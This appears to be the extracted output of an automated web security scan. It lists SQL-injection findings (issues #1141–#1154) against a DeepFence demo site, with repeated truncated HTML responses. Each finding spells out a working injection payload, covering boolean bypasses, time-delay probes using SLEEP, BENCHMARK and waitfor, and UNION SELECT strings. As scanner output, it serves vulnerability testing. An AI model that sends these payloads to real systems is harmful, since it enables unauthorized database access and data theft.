src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1141\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1142\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# waitfor delay '00:00:05'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1143\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\"or 1=1 or \"\"=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1144\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or (\"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1145\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1146Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or '1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1147\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=0--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1148\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# #\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1149\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1\n#ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1150\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# %\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1151\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1152\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1153\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# +benchmark(3200,SHA1(1))+'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1154\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" 